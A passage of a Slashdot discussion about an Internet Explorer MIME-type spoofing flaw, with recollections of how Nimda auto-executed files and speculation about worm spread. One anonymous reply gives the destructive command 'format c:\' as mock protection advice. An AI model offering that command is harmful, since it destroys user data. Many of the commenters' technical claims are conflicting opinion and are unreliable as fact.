      In fact, the article says it was only reported to Microsoft late last month and that they're testing a patch now.... two and a half week turnaround time is much different than two and a half years.

      And no, Open Source isn't the silver bullet to prevent bugs like this.... how long was that recent root exploit in the Linux kernel before anyone noticed it?

      --

      NO CARRIER
  13. Re-post? by Zspdude · · Score: 5, Funny

    Does anyone else notice that this story has been posted before, many times, with only slight variations each time?

    --
    What's in a Sig?
    1. Re:Re-post? by A_Non_Moose · · Score: 1

      AAAaaahahahahahaha...

      Ummm, where've you been?

      I wish I could find the link to a vulnerability in the .asf (stands for Another Security Flaw) format that has appeared no less than 3 times.

      IOW, Microsoft patched it, re-introed the same bug/vulnerability patched it again, re-did it again. Wash, rinse and repeat.

      The comment is/was something to the effect of "this is so freakin' stupid, it is the same bug over and over again". Paraphrasing a quote from a bugtraq'er (IIRC)

      wish I could find the link, I think it was appleworks.com, their quotes in the news section from 2 weeks ago.

      Slashdot repeats stories, Ms repeats security flaws and slashdot repeats stories on repeated MS security flaw...coincidence? perhaps.

      Am I being redundant?
      Am I being redundant?
      Am I being redundant?

      --Robin Williams

      Ever since the rise of the CD, the phrase "sounds like a broken record has lost all meaning".

      .

      --
      Have you read the moderator guidelines? Well, have you, PUNK? (and I want a Karma: Gnarly option)
    2. Re:Re-post? by sstrick · · Score: 2

      Isn't it good to see Michael reporting it in a unemotional, non-biase style as well?

      --

      "Do you think we could wipe out world hunger forever if scientists figured out how to make AOL's Free CD's edible?"-
    3. Re:Re-post? by Liquor · · Score: 1

      It's not the same story. Last time it was posted, it included IE4 in the list of vulnerabilities.

      Now, they don't even admit that anyone is still running IE4. (Well, I shouldn't admit to running it, either.....)

      (For that matter, has anybody tried setting the same content-type MIME headers in an e-mail?)

      --

      Liquor
      Sanity is a highly overrated commodity.
    4. Re:Re-post? by Anonymous Coward · · Score: 0

      >It's not the same story. Last time it was posted, it included IE4 in the list of vulnerabilities.

      That's what he's getting at, dimwit. Similar security bugs keep surfacing, making it seem as if the /. story was a repeat.

      The post is moded +5 Funny, didn't that give you that first clue? If you have to explain why something is funny...

    5. Re:Re-post? by Some+Dumbass... · · Score: 1

      Does anyone else notice that this story has been posted before, many times, with only slight variations each time?

      We're definately stretching the meaning of the word "news" here :)

    6. Re:Re-post? by darkonc · · Score: 2
      (For that matter, has anybody tried setting the same content-type MIME headers in an e-mail?)

      I think that a form of this bug was exploited in the Nimda virus and friends, and I've definitely recieved emails that do the same -- random filetype, but the attachment is *.exe. Given that I use Mozilla and Linux, it hasn't been a problem, but I'm sure that other people have been nailed by these things.

      --
      Sometimes boldness is in fashion. Sometimes only the brave will be bold.
  14. Re:Now that this particular cat is out of the bag. by dsb3 · · Score: 5, Funny

    What kind of steps can people use to protect themselves now?

    If you really want to toggle IE into secure mode you just need to click the little "X" in the top right corner of the window.

    --

    Slashdot? Oh, I just read it for the articles.
  15. Wow, that was harsh! by Anonymous Coward · · Score: 0

    But entirely true and well deserved. I think they will be forced to patch this real soon now though, since now that the word is out many user's webmail will start filling up with all sorts of wonderful attachments to exploit this.

  16. Re:Now that this particular cat is out of the bag. by Anonymous Coward · · Score: 0
    What kind of steps can people use to protect themselves now, is there any kind of toggle or security setting that can be turned on in IExploiter 5.0(tm) to keep us a little bit safer?

    format c:\

  17. what will happen if by elliotj · · Score: 3, Redundant

    someone decides to put up a website to demonstrate this vulnerability. the site deletes everything on your harddrive. someone else decides to embed this into an HTML email. this email is sent to lots of people and deletes their harddrives.

    will MS be held responsible? will the person who put up a website as a 'proof-of-concept' be held responsible? what about the guy who sends around the email?

    ultimately folks, I think the end user is going to be held responsible. i don't know about the rest of you, but the company I work for will hold me responsible if our systems fail. and blaming MS isn't going to help me one bit.

    now that this cat is out of the bag...what can we do to protect ourselves if we can't switch from Windows b/c our jobs won't let us?

    1. Re:what will happen if by smnolde · · Score: 2

      I went to some webcam site today and it added two entries to IE proxy config to bypass my local proxy for two inetcam.com domains. Keep in mind I only visited the one web page that did this.

      I wonder if what happened to me was performed via this knowledge.

      Shit like this makes pisses me off.

    2. Re:what will happen if by DeadMeat+(TM) · · Score: 2
      Nimda already did this, to some degree. Both the Web page and E-mail worm version of it (Nimda attacked on so many different fronts -- IIS, IE, SMB, and OE -- it was insane) passed .EXE files to the user using standard HTML redirects. (Or something similar. I don't know the exact tech details since our university's POP3 was kind enough to filter Nimda, so I didn't get a live specimen to look at.)

      No problem for most E-mail programs or browsers, since they'll just prompt to save the .EXE file to disk. Not so with IE or OE -- the message/page was hacked up to give the .EXE file an audio/x-wav MIME type, so it got executed right away instead.

      Incidentally, I've seen a variant of Nimda/BadTrans/OE-worm-of-the-week over the past couple of days that's been using the BadTrans "Re: " subject but tries to automatically launch an attached file ala Nimda instead of relying on social engineering. I've just been dumping it in the trash, but next time I get one I'll look at the source to see if it's using MIME types.

    3. Re:what will happen if by Stenpas · · Score: 1
      someone decides to put up a website to demonstrate this vulnerability. the site deletes everything on your harddrive. someone else decides to embed this into an HTML email. this email is sent to lots of people and deletes their harddrives.

      Although in the short term that's bad, in the long run I could see something like this that breaks Microsoft's monopoly. Either that or an outlook virus that does the same thing. It's the only way normal consumers and buisnesses would look at alternative OSes.

    4. Re:what will happen if by dakoda · · Score: 1

      ultimately folks, I think the end user is going to be held responsible

      No, that can't happen! it's never the 1d10t users fault. goner worm never got users in trouble, even though it required them to click stuff. probably a similar case with other things of this nature.

      the customer is always right mentaility is causing a lot of dumb customers these days.. ('i want a computer with a gigabyte!') they never get blaimed. its always Someone else's Fault (tm).

    5. Re:what will happen if by Anonymous Coward · · Score: 0

      A little bit more creativity, please. Deleting hard drives is so last-millenium. Why not write a virus that automatically downloads and installs Linux with fvwm95, Star Office and Wine. Then wait for people all around to go:"You know it's weird. First I got this strange email and now my Windows doesn't crash anymore. And tech support always told me they couldn't fix my computer via email." :-)
      I wonder if the writer of this virus could be sued for "damages".

    6. Re:what will happen if by TrixX · · Score: 2

      now that this cat is out of the bag...what can we do to protect ourselves if we can't switch from Windows b/c our jobs won't let us?

      Install Mozilla or Netscape to browse and read email. Don't use MS tools for accessing the Internet.

    7. Re:what will happen if by Anonymous Coward · · Score: 0

      You mean I have to down-grade? Netscape is a poor substitute for IE still.

    8. Re:what will happen if by Anonymous Coward · · Score: 0

      But hey, if they do destroy everyone's hard drives,
      atleast the internet will have about 20 to 50% more bandwidth for us "techie" users to use =-)

    9. Re:what will happen if by uebernewby · · Score: 2

      No problem for most E-mail programs or browsers, since they'll just prompt to save the .EXE file to disk. Not so with IE or OE -- the message/page was hacked up to give the .EXE file an audio/x-wav MIME type, so it got executed right away instead.

      Actually, if you use plain ol' media player and leave the settings untouched, such a file will be opened in media player without it getting saved to disk or executed. You won't actually *hear* anything, though ...

      --

      News and bla for computer musicians: http://lomechanik.net/
    10. Re:what will happen if by Vulture_ · · Score: 0
      In other words, they expect you to do your job (protecting your system[s]), but don't allow you to do it (because doing it would require switching to another OS, which they do not permit).

      This means that it is not possible for you to avoid getting fired for incompetence or some other green, liquid horse shit.

      The solution, of course, is to protest and resign.

      --

      The only way the typical /.er can pick up a chick is with a forklift. -- AC

  18. Security through unavailability by sapped · · Score: 1

    I prefer to call it security through unavailability. The unavailability of IE that is.
    Go Galeon!
    Security and a fast browser: Great stuff
    Built on top of a free OS: Priceless.

    No, really it is priceless...

  19. IE on other systems... by sammy.lost-angel.com · · Score: 1

    From the slashdot article it doesn't seem like it would affect IE on other platforms (such as Mac OS). Although that probably affects only 4% of web traffic, it's important to note.

    1. Re:IE on other systems... by RedWolves2 · · Score: 1

      IE on the Mac is not built into the OS. Therefore you do not get the security concerns that you do in Windows.

    2. Re:IE on other systems... by sammy.lost-angel.com · · Score: 1

      that's what i meant to say. of course most slashdot readers realize this. so in hindsight my comment was pretty much worthless.

    3. Re:IE on other systems... by Anonymous Coward · · Score: 0

      .. and Macintoshes don't identify file types by their TLE (three letter extension). Instead, they use a much more resiliant system of having what they call a resource fork, which goes everywhere with the file and contains information ABOUT the file. If you browse a mac file system on something other than a mac, you can see the fork files. On a Mac, they're normally hidden by the OS as they're considered be be a part of the information about the files that do show up.

    4. Re:IE on other systems... by Anonymous Coward · · Score: 0

      IE on Mac is an absolute dog - we use Netscape 6.1, Icab, Netscape 4.7x, anything to avoid IE. Takes an incredible amount of memory, loads slow, and is broken in so many ways it's not even funny.

    5. Re:IE on other systems... by yomegaman · · Score: 1

      I doubt if too many files coming in over HTTP have resource forks.

      --
      ...wearing a skin-tight topless leather jumpsuit, with cutaway buttocks and transparent crotch panel.
    6. Re:IE on other systems... by Anonymous Coward · · Score: 0

      you doubt wrong

  20. hmm.. by Suppafly · · Score: 3, Informative
    Somehow you can just get a feel that this story has been posted by michael instead of someone actually knowledgeable about tech issues


    If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything.


    This is just not true. You specifically have to download things before they can do anything using IE and if you are dumb enough to use outlook and let it have the ability to execute file attachments automatically, you deserve what you get.

    1. Re:hmm.. by 90XDoubleSide · · Score: 1

      Didn't read the story, did ya troll? The exploit is another one that allows a content type to be set that will cause executable code to download and execute without user intervention.

      --
      "Reality is just a convenient measure of complexity" -Alvy Ray Smith
    2. Re:hmm.. by aozilla · · Score: 5, Informative

      The exploit is another one that allows a content type to be set that will cause executable code to download and execute without user intervention.

      Hmm, did you read the story?

      Any way to skip all dialogs, ie. to run an application without ANY dialog with this vulnerability has NOT been found. In all variations of the exploit there is always the normal file download dialog, but the following Security Warning dialog is skipped.
      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    3. Re:hmm.. by dangermouse · · Score: 2
      I think the logic he's using is that Outlook embeds IE's HTML-viewing component, and is therefore susceptible to the same attack... and you can't disable HTML viewing in Outlook.

      As for whether those statements are accurate, I have no idea.

    4. Re:hmm.. by Anonymous Coward · · Score: 0

      Ah ha! The tables have turned! The hunter has become the hunted and the hunted has become the hunter!

      [Reply with dumb anti-Microsoft joke] [Parent]

    5. Re:hmm.. by jroysdon · · Score: 1

      MS doesn't have a way to block Outlook from viewing HTML, but you can with this hack.

    6. Re:hmm.. by H310iSe · · Score: 2, Insightful

      Actually, I.E. will automatically download (to the internet temp directory) and then 'run' certain documents - .doc files come to mind (not sure if this behavior only happens if Office is installed). Not to double guess the experts but it seems like if your .exe file was spoofed as a .doc file you *would* automatically download and execute it w/o any dialogue. For that matter, a .txt file, and even a .xml document will automatically load, or a .jpg, or blah blah blah.

      Of course I can't test this because....

      And I think I recall that ASP has the ability to control headers so you don't need to "control a web server," you just need to host your page on a web server with IIS installed so you can run ASP.

      --
      closed minded is as closed minded does
    7. Re:hmm.. by rela · · Score: 1
      Hmmm, did YOU read the story? THE FIRST ONE, THE MOST RECENT ONE, not linked at the bottom??

      Pynnonen's initial advisory on the flaw did not describe the automatic downloading vulnerability and was concerned instead with the browser's failure to properly differentiate between file types.

      Read the story. Read the other comments. Then post.

    8. Re:hmm.. by RodeoBoy · · Score: 1

      Like myself and others have pointed out nimda does this already with no warning what so ever. Norton AV will get it when it comes, but if you do not have a good quality AV, Definitions uptodate and set up correctly you would never know. I have this friend who is a total MS fan and very ingorant about what happens on his computer. I convinced him to put Norton AV on his machine, because at the time he was not using anything. One day I was at his house and he wanted to show me something on his machine and the a pop up to update Norton comes up. Right then he complains that why did I convince him to install this application, because it always asks to download updates and they just took too long. I asked if he had been doing the updates, but he says no because they were in his words "too much of an inconveniance.

      Now stay with me it gets better. A couple of weeks later he phones me up and starts talking about this funny thing he say on the net. Another friend of his, some sort of Rocket Scientist ;^) says "hey you have to check out this web site, of some company or aonther, that has on its main page America Suck in big red letters." His friend adds that it was infected by one of these internet worms. So my friend of course goes and checks it out. He proceeds to laugh at me because I do development in the MS world and a lot of my work involves making B2B web apps. He tells me that, in his enlightened opinion :^0, only a fool would run that stuff on the web.

      Now here is the good part. I ask him if the only reason he call was yank my chain, and he says no. He called because his Outlook quit working and his machine was acting really slow. I told him to phone his other buddy, the one who suggested the web site, and ask him if he was having the same problem. I have not heard from either of them since. I think he figured out that I was not coming over to help him fix his damn machine for a couple of beers. For those that have not been keeping up, his box was infected by nimda when he visited the site in his IE browser, because his AV definitions were not current he was infected WITH NO WARNING. How do I know this is the case you ask? Because I have visited sites, with IE, that get logged on my home IIS box, by ip addy? Everytime Norton tells be it found one in the web page and has put it in the penalty box. Now if I only knew how to disect one of these puppys. Each page says America Suck in bold red letters.

      The funny thing is that my clients and my own employer have had zero, ZERO problems with any of the worms or viruses that have been getting headlines lately. These are all big corporation, and we all use Outlook, IE, IIS etc. Like I always say it doesn't matter what box you use, but the work you do. My paw always said a poor craftsman blames their tools.

      I always laugh when these linux hobbists that have to work in the NT world to make a living have stories about how their IIS box at work was infected or some user opened an attachment that had a virus and act like it was all some suprise to them. Like they didn't realize that features can be fire or users will do dumb things. I mean who is the one getting paid to keep the system running and safe. From the way I see it the wrong person that's who.

      It is fourty below and I don't give a ...

    9. Re:hmm.. by Anonymous Coward · · Score: 0

      You can control the autoload feature for Word and other Office documents:

      Windows Explorer: Tools+Options, File Types, Advanced, "Confirm Open After Download".

      MS has/had a tool that helped you manage this setting.

      The issue with ASP and headers also extends to most Unix hosting environments too.

  21. Overreaction from Michael. by Oily+Tuna · · Score: 4, Flamebait


    Michael says : "completely open any time you browse the web with IE. "
    Story says "who view a specially constructed Web page"

    Okay, the hole isn't good - and MS must fix it - but the article as posted by /. is wrong.

    Your computer is open if you stumble across a specially constructed site. If you browse /. the news, stock quotes etc. then you're prett much safe.

    --
    Mmmmmmm ... sushi.
    1. Re:Overreaction from Michael. by dsb3 · · Score: 2, Insightful

      Pretty much safe ... UNTIL ... someone hacks a server (gee, let's take doubleclick.com for example) and re-writes the billion or two popup ads that get sent out a day.

      Ooops. Guess everyone's exposed now.

      --

      Slashdot? Oh, I just read it for the articles.
    2. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      Yep. Now watch him silently correct the article without the "Update:" tag, like he usually does.

    3. Re:Overreaction from Michael. by shadoi · · Score: 2, Insightful

      And what about when you click on that innocent little HOWTO.txt link for a problem that's been bugging you. Whether it's on slashdot.org, msn.com, or goatsex.com, they can all support links by anonymous (or registered) users. I've done this very thing quite often myself. Not to mention a wiki, or any other form of free-posting service of any sort on the web.

      It all goes down to the level of trust you put in a site, it's users, and/or each specific link you click on. Do you want to have to worry about it?

      The process goes:
      1) Think
      2) Type
      3) Think some more
      4) Preview/Proofread
      5) Submit
      etc..

      - shadoi

      --
      -- "Chaos often breeds life, when order breeds habit." -Henry B. Adams
    4. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      It all goes down to the level of trust you put in a site, it's users, and/or each specific link you click on. Do you want to have to worry about it?

      Looks like I'm safe reading /. - I seriously doubt any of the posters to this site have the brains to pull this off.

      They are all to busy arguing about how good linux is and how bad microsoft is.

    5. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      If people are stupid enough to run something directly from the internet, they deserve to have their hard drive formatted etc. Like so many other "exploits" and security holes, this requires the user to do something that should never be done anyway. The bug is that it is possible to run instead of download files.

    6. Re:Overreaction from Michael. by jmv · · Score: 2

      Can you say you never ever ended up loading a page from a site you don't trust 100%? Then you'd be (almost) safe, but the 99.9% others using IE aren't. Not to mention what some others have said: even an html e-mail can cause problems as soon as you *view* it... and consider that lots of e-mail clients (don't know about Outlook) don't let you delete a mail before viewing it...

    7. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      You know why NIMDA spread so much faster than most worms?

      When it exploited an IIS server, it would replace the pages with ones that exploited an older vulnerability; if the HTTP content-type header was set to wave file, IE would happily play the file for you, even though it's extension was .exe (and by play, I mean run).

      We better hope that no new IIS bugs are discovered in the next couple of months.

    8. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      come on..stop crying and yelling, beeing that anti-microsoft is not good, now michael looks like a fool.

      what danger can cause this?

      1. You receive a file called nice.jpg you open it, a dialog opens up because the header of the file is application/stream then the file is executed..boom same trick as nice.jpg.exe

      2. You receive a file called nice.exe and the brower will try to open it..but IT WONT EXECUTE the file.

    9. Re:Overreaction from Michael. by mandolin · · Score: 5, Funny
      No shit. I've think I've decoded the /. exploit-article posting formula:

      1) Take MS exploit.

      2) Rail about security through obscurity. Ignore similar linux issues.

      3) Rail about how long a bug has been open. Ignore similar linux issues.

      4) Ignore the linked article, and claim something stupid. In this case that MS isn't in a hurry to release a patch when in fact they have been testing a patch.

      5) Jump to conclusions, like " It's a fundamental design issue".

      6) Somehow tie the whole thing into the anti-trust suit.

      Did I miss anything?

    10. Re:Overreaction from Michael. by dieMSdie · · Score: 2

      Did I miss anything?

      Yes, you did.

      7) Watch the Microsoft apologists come out of the woodwork like bugs when you lift a rotted log ;)

      --
      Don't throw your computer out the window, throw the Windows out of your computer!
    11. Re:Overreaction from Michael. by mandolin · · Score: 1
      7) Watch the Microsoft apologists come out of the woodwork like bugs when you lift a rotted log ;)

      Ouch! Nice :).. although my intent was to criticize the reaction rather than to justify all the crap MS has done. Sorry I didn't make it clear.

    12. Re:Overreaction from Michael. by OblongPlatypus · · Score: 4, Insightful

      There may very well be similar linux issues, but couldn't you have found better examples?

      2) The Alan Cox changelog story isn't about security through obscurity, it's a silly political statement regarding the DMCA. And the other link is about Red Hat preemptively releasing a security advisory in an attempt to *avoid* obscurity.

      3) The bug in this story is a *local* root hole, which doesn't even apply to most windows versions, and which certainly doesn't make for a relevant comparison in this case.

      --
      -- If no truths are spoken then no lies can hide --
    13. Re:Overreaction from Michael. by fishebulb · · Score: 1

      good post, except that number 3, that was done for satire. i doubt microsoft is doing it to mock other people

    14. Re:Overreaction from Michael. by ninewands · · Score: 2

      Every e-mail client I've ever seen (with the possible exception of some early versions of Eudora) allows you the option of adjusting the layout so that there is no "preview pane" ... NOW you can delete the e-mail without opening it by right-clicking on the subject line in the header list and selecting delete from the context menu ...

      Or, you can use Linux and pine, elm, mutt, or one of the other console-type mail clients that have NEVER had a "preview pane" and be shed of the problem.

    15. Re:Overreaction from Michael. by scrytch · · Score: 2

      7) Watch the Microsoft apologists come out of the woodwork like bugs when you lift a rotted log ;)

      If not pointing and shouting nanny-nanny-boo-boo and making irrelevant snide faux-clever asides about antitrust suits is being a Microsoft apologist, then baby, count me as one

      --
      I've finally had it: until slashdot gets article moderation, I am not coming back.
    16. Re:Overreaction from Michael. by jmv · · Score: 2

      Any tip as to how to do that with Mozilla mail and Evolution? If so, I'm interested, because this pisses me off (I'd like to delete spam without needing to display it first)... Most of the time right-clicking on a title displays the message, which is annoying...

    17. Re:Overreaction from Michael. by woggo · · Score: 4, Informative
      Your computer is open if you stumble across a specially constructed site.


      That's a little like saying "an unlocked door is only insecure if a burglar enters through it," isn't it? Your computer is open and insecure; the existence or non-existence of special trickery sites is irrelevant, especially considering how little we can trust existing sites (some high-profile site gets cracked/subverted every few months at least) or even existing certificates (cf. the recent M$/Verisign debacle). The point is that having a broken security model is unjustifiable, and to claim that a breach this large is not a big deal because someone is unlikely to stumble across an exploit page is irresponsible at best and blatant shilling at worst.

    18. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      8) Watch all the professional Microsoft haters (like our friend dieMSdie) slither out of their holes to commence the flamewar

      9) Sit back and enjoy Slashdot!

    19. Re:Overreaction from Michael. by ninewands · · Score: 3, Informative

      An argument that proceeds from false premises is flawed no matter how logical its conclusions may seem.The specific flaws in these premises are:

      2) Rail about security through obscurity. Ignore similar [slashdot.org] linux issues [slashdot.org].

      The first link is to a story that questions Alan Cox's decision not to expose himself to a Sklyarov-type persecution under the DMCA by revealing the reasons for certain security bugfixes in a kernel patch-level release.Despite the fact that Alan didn't reveal the specific nature of the bug that was fixed, the bug was, in fact, fixed.

      The second link refers to a remotely root-exploitable hole in wu-ftpd.Although almost every Linux distribution includes wu-ftpd, it is well-known as a source of security problems, and in those distros where it is installed and enabled by default the distributor usually takes fair pains to make sure that it is installed as securely as the state of reasonable knowledge of its problems allows.Also, IIRC, wu-ftpd also runs under Windows, where it serves the function of being an alternative to IIS's ftp server functionality.At this moment, I don't have the time to research the irrefutable facts, but my anecdotal impression, which comes from my experience as both a Windows and Unix admin indicates that the score in the IIS vs. Apache + wu-ftpd exploit game is more than a little lopsided in favor of IIS being the cracker's friend.

      3) Rail about how long a bug has been open. Ignore similar linux issues [slashdot.org].


      Ah yes ... the "ptrace() 'bug'" ... how the Microsoft apologists LOVE that one.A design flaw, rather than a true "bug". There is absolutely NO evidence that this vulnerability has ever been exploited, yet, please allow me to ask you one question ... the ptrace() system call worked exactly as designed ... that the design was flawed ... well, no one's perfect ... .believe it or not, I even cut Microsoft some slack on design flaws unless the flawed design is so totally bone-headed that a freshman Comp Sci student wouldn't have done it that way.

      Now for the question ... HOW LONG was it, after the design flaw became known, that the flaw was fixed and new releases made to fix it.A day or two?

    20. Re:Overreaction from Michael. by mandolin · · Score: 1
      Depends on your point of view. I'll give you the AC link now that I think coherently it. As for the second story, RH broke the news only when they had a patch. (but, bully to them for at least coming out then.)

      As for the last story, I was attempting to compare timescale, not magnitude of the bug. You may accuse me of generalizing and I may accuse you of picking nits; the truth probably lies somewhere in between. Anyway, if you'd like an example of a long-lived *remote* root exploit, this should probably do the trick.

    21. Re:Overreaction from Michael. by mandolin · · Score: 2
      First link's worthlessness conceded in another post.

      Second link: hats off to those who don't run wu-ftpd. I would never claim that all linux systems are alike. As for those who do (run wu-ftpd), arguing over whether a given windows or linux combo is worse is almost pointless.. they're both buggy POSs and it takes one crack to ruin the box.

      As for the third link..

      A design flaw, rather than a true "bug"

      I do program, and where I come from, design flaws usually count as bugs. Usually they're the hardest ones to fix

      There is absolutely NO evidence that this vulnerability has ever been exploited

      You could apply that statement to MS's latest problem, and you'd be equally foolish

      HOW LONG was it, after the design flaw became known, that the flaw was fixed and new releases made to fix it. A day or two?

      This is just from the searching I have done, and it's so ridiculous I actually don't believe it myself; somebody *please* correct the errors here, but AFAICT: Flaw published1/4/01, apparently fixed by redhat 4/10/01 (debian nailed this on 4/16). Somebody noticed on the kernel mailing list 7/24/01 that there was still a problem (improved exploit perhaps?), and this was fixed by redhat on 10/09/01. I can't find a second debian fix; maybe they got it right the first time. Anyway to answer your question, not quite.

    22. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      That's right! Either you're with us, or you're with the terrori... er... Microsoft apologists! Yeah, that's it!

    23. Re:Overreaction from Michael. by TheMidget · · Score: 1
      Michael says : "completely open any time you browse the web with IE. " Story says "who view a specially constructed Web page"

      That's like saying: "it's not dangerous to walk Central Park by night, the only dangerous thing is to get near a robber". Problem with both reasonings: how is the casual user going to know in advance whether the the Web page is specially constructed or not? Or whether that man over there is a robber who'll turn around the next second, and stick a gun on you?

      Actually, if you had read the link, you could have found a real argument in your favor: the exploit does actually pop up a suspiciously looking "Save file" dialog, which you wouldn't normally get for html or gif files. However, for a PDF file, the same dialog would be much less surprising, so just name your thing exploit.pdf.exe...

    24. Re:Overreaction from Michael. by Raphael · · Score: 2
      Michael says : "completely open any time you browse the web with IE. "
      Story says "who view a specially constructed Web page"

      Both of these sentences are right and there is no contradiction between them. "browsing the web" assumes that you are viewing several web pages. A "specially constructed web page" may have been created by a worm or a Trojan horse. This means that even if you only browse "trusted" sites, you are completely open to any attack involving this IE bug, because these sites may have been infected by the worm.

      From what I could read in the Bugtraq discussions, it looks like it should not be hard for a black hat to write a worm that exploits this IE bug and modifies any ASP pages that it could find on the same machine (or other Windows hosts that have open shares). Once the web server is modified in that way, it would propagate the worm further and infect other IE users.

      If you think that this scenario is unrealistic, please think about how Code Red and Nimda have been infecting millions of Windows computers recently.

      And if you think that you are safe browsing Slashdot, think about what would happen if the OSDN ads server was infected...

      --
      -Raphaël
    25. Re:Overreaction from Michael. by karlm · · Score: 1
      You're right, as long as there aren't any new bugs in IIS/Apache/etc. We all know how often webservers have bugs discovered. The next CodeRed wanna be uses this and thousands of people are scewed. Didn't hotmail get hit by CodeRed? What if the next guy to discover an IIS bug decides to devlop a waorm (that spreads by several means, like Nimda) before telling anyone about it? If hotmail and msnbc both get infected, that's a huge distribution base. Most people would click "download" for anything from one of those sites, after all they know not to run the thing. The problem is that once they click "okay" to download, it executes. The stupid user's machine is now spreading the worm If this thing also infects windowsupdate.microsoft.com, then MS has a problem on its hands. Combine this with an automatic DDoS attack on the major virus protection sites, and you have an epidemic with a slow immune response.

      THe major problem with something like this is that it increases the optimum destructiveness and propigation rate of worms. Once a worm spreads via major news/email/update sites, it's in the worm's best interest to become as destructive as possible in order to get people to flock to those sites and download things from those "trusted" sites without thinking.

      Problems affecting stupid users are much worse than those affecting servers, simply due to the relative population sizes.

      By the way, has anyone else wondered if an email trojan that uses 5th or 6th order Markov chains to mimic the language of the local machine would spread faster than our ability do translate warnings into all the world's languages? (SirCam's sucess despite bad English made me think of this. If joe average got something that half made sense in his own language, would he be more tempted to open the attachment in order to make sense of the email?)

      --
      Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
    26. Re:Overreaction from Michael. by arminh1974 · · Score: 1

      Not necessarily ... any forum / board which let's you use customized HTML-signatures can be used if you can embed code which then points to a prepared setup. And as far as I know, PHP should support sending hand-crafted HTTP-headers... PHP is the most popular Hypertext-preprocessor. Hrmmm....

    27. Re:Overreaction from Michael. by geschild · · Score: 1

      I can think of one or two things you missed yes...

      a) CowboyNeal!
      b) Every slashdotter is a windows user at heart if only (s)he could afford it...

      Now for the short short version of the other arguments against your post: you've succeeded nicely at painting apples orange so you could compare them.

      For instance, in point 2 and 3 you're comparing life-long (mis)behaviour on MS' part with incidents in the Linux community and even then your examples are wrong too.

      In point 4 you tell us they've been testing the patch. They _could_ have told the world about the work-around for this when they found the flaw:

      DON'T OPEN ANY FILETYPE. ALWAYS SELECT SAVE

      For point 5: this _is_ a fundamental design flaw. The fact that it doesn't have the severe implications some suggest doesn't diminish that fact by one bit.

      For point 6 I can only say: be glad he didn't tie it to Cowboy Neal. Be _very_ glad.

      .

      --
      Karma? What's that again?
    28. Re:Overreaction from Michael. by rseuhs · · Score: 1
      Your computer is open if you stumble across a specially constructed site. If you browse /. the news, stock quotes etc. then you're prett much safe.

      Pretty much, yes.

      Depends if "pretty much" is good enough for you. With Code-Red, Code-Red2 and Nimda, Millions of webservers were infected and Nimda already did something to infect clients via IE.

    29. Re:Overreaction from Michael. by rseuhs · · Score: 1

      Well in this case it *IS* a fundamental design flaw because Windows/IE seems to handle file types inconsistently.

    30. Re:Overreaction from Michael. by RickHunter · · Score: 1

      Except the "similar Linux issues" aren't similar. This is a bug in a piece of USERLAND software, which Microsoft routinely claims is 100% secure for use by uninformed computer users. This bug allows arbitrary code to be run on a Windows system without the user knowing they are running code. In fact, the code advertises itself as being something else.

      Now, if you've found a "similar Linux issue", report it to the Konqueror, Mozilla, Lynx, W3C, Galleon, and Netscape teams, because they'll sure as hell want to know about a kernel hole (because that's what Linux is) that causes their browsers to behave similarly to this. Except for the fact that we weren't dumb enough to integrate our browsers with our operating system kernel.

      Oh, wait. I forgot. The above recieved +2 - irrational ranting about how Slashdot sucks and +2 - Pro-Microsoft.

      Michael's writeup was actually good this time, accurately summarizing the article content.

    31. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      It's not an overreaction - you may say "nobody would ever do X"; however, users will do "X", repeatedly. Trust me. I work for an ISP - we get lots of calls from clueless users, most of whom automatically click "Open from current location". It's sort of a Pavlovian reaction ("look at the pretty colors....").

    32. Re:Overreaction from Michael. by archen · · Score: 1

      if you know it's spam just by it's title, you should probably set up a filter just to send it to the trash. I dump about 90% of my spam just by specifying anything that isn't addressed to me, to go to the trash (assumably they use cc, or bcc).

    33. Re:Overreaction from Michael. by Karmageddon · · Score: 1
      with mozilla, click on the little piece of window frame between the preview window and the list of headers. it even has some decorations on it to show you where to click.

      same for netscape mail, and the same whether on windows or linux

    34. Re:Overreaction from Michael. by shimmin · · Score: 1

      I may be missing something, but aren't all those links you cite evidence that Slashdot does not ignore similar Linux issues?

    35. Re:Overreaction from Michael. by Sloppy · · Score: 2

      If you browse /. the news, stock quotes etc. then you're prett much safe.

      Understood. If I only give my file server's root password to the people who run the web servers for news, stock quotes, etc. then I'm pretty much safe. There is nothing to worry about.

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    36. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      What you said is true for everyone who doesn't use IE. For IE users the rule is now different. The new rule is: "If people are stupid enough to read or view something directly from the Internet, they deserve to have their drive formatted." The user doesn't have to tell their computer to run a program; they just have to click on a link.

    37. Re:Overreaction from Michael. by Syberghost · · Score: 2

      If you browse /. the news, stock quotes etc. then you're prett much safe.

      Unless somebody puts in a link and you click it.

      But, as long as you don't click on any links, you're safe as houses.

      Unless somebody hacks /. But that could never happen, right? Completely impossible.

      How long can you breathe with your head buried in the sand like that?

    38. Re:Overreaction from Michael. by mandolin · · Score: 1
      Yes. Very poor choice of words on my part.

      s?ignore?forget?g

    39. Re:Overreaction from Michael. by Anonymous Coward · · Score: 0

      > Did I miss anything?

      7) Wait for ms astrotuffer/apologist/ to notice and generate hits.

      Troll? probably as much as the origanal post.

    40. Re:Overreaction from Michael. by arkanes · · Score: 1

      Well, if it's NOT a fundamental design flaw I want to know why it's taking them 18 months(!) to patch it.

    41. Re:Overreaction from Michael. by RedWizzard · · Score: 2
      2) Rail about security through obscurity. Ignore similar [slashdot.org] linux issues [slashdot.org].

      3) Rail about how long a bug has been open. Ignore similar linux issues [slashdot.org].

      How exactly are they ignoring similar Linux issues? All your links are to slashdot articles - pretty strange sort of ignoring. If you mean they've ignored Linux in the this article then so what? It's an article about IE not Linux.
